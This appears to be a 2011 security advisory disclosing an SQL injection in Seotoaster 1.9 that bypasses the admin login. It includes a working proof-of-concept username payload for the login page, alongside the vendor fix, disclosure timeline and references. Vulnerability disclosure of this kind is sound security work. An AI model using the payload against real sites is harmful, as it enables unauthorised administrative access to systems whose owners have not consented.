Seotoaster version 1.9 suffers from a remote SQL injection vulnerability that allows for authentication bypass.
a28fad089e8020fcf599c35517f77036da894801e14d71b40f0b3705084df78f
Advisory: Seotoaster SQL-Injection Admin Login Bypass
Advisory ID: INFOSERVE-ADV2011-06
Author: Stefan Schurtz
Contact: security@infoserve.de
Affected Software: Successfully tested on Seotoaster v.1.9
Vendor URL: http://www.seotoaster.com/
Vendor Status: fixed
==========================
Vulnerability Description
==========================
Seotoaster v.1.9 is prone to an SQL-Injection which bypass the admin login
==================
PoC-Exploit
==================
http://<target>/seotoaster/go
User: ' or 1=1)#
PW: notimportant
=========
Solution
=========
Upgrade to the latest version
====================
Disclosure Timeline
====================
15-Nov-2011 - Secunia SVCRP (vuln@secunia.com)
15-Dec-2011 - fixed by vendor
========
Credits
========
Vulnerabilitiy found and advisory written by the INFOSERVE security team.
===========
References
===========
http://secunia.com/advisories/46881/
http://www.infoserve.de/system/files/advisories/INFOSERVE-ADV2011-06.txt